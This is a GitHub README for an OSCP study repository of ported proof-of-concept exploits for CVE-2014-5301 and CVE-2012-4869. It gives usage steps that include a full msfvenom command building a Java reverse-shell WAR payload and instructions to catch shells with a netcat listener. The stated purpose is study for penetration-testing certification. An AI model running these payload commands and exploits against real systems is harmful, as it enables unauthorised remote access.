Skip to content

AndyCyberSec/OSCP

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

18 Commits
 
 
 
 
 
 

Repository files navigation

OSCP

This is a repository which contains custom/ported POC exploits. They have been made for study and learning purposes. Currently under development.

35845.py

CVE: 2014-5301

OSVDB: 116733

URL: http://seclists.org/fulldisclosure/2015/Jan/5

Original metasploit module: https://www.exploit-db.com/exploits/35845

Usage

35845.py file.war host port
  1. First create reverse shell payload
msfvenom -p java/shell_reverse_tcp LHOST=<ip address> LPORT=4444 -f war > shell.war
  1. Start netcat listener

  2. Run the script

35845.py shell.war 192.168.1.1 8080

Note: The exploit may require multiple run to get it working. Don't give up!

18650.py

CVE: 2012-4869

URL: http://seclists.org/fulldisclosure/2012/Mar/234

Original code: https://www.exploit-db.com/exploits/18650

Usage

Edit the file and change rhost, lhost, lport

  1. Start netcat listener on the port you configured

  2. Run the script

python 18650.py

Releases

No releases published

Packages

No packages published

Languages